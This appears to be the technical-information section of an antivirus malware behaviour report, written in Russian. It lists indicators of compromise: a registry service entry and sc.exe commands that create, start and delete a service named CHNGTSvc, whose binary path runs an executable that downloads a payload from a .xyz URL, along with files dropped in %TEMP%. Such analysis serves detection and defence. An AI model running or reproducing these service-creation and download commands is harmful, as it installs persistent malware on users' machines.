Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.3d5ba658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe'
- '%TEMP%\nsy2.tmp\ns5.tmp' sc start CHNGTSvc
- '<SYSTEM32>\sc.exe' start CHNGTSvc
- 'C:\exervice.exe' http://cl########.####a658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####a658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe"
- '%TEMP%\nsy2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- '%TEMP%\nsy2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####a658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe"
- %TEMP%\nsy2.tmp\ns4.tmp
- %TEMP%\nsy2.tmp\ns5.tmp
- %TEMP%\nsy2.tmp\ns3.tmp
- C:\exervice.exe
- %TEMP%\nsy2.tmp\nsExec.dll
- %TEMP%\nsy2.tmp\ns4.tmp
- %TEMP%\nsy2.tmp\ns3.tmp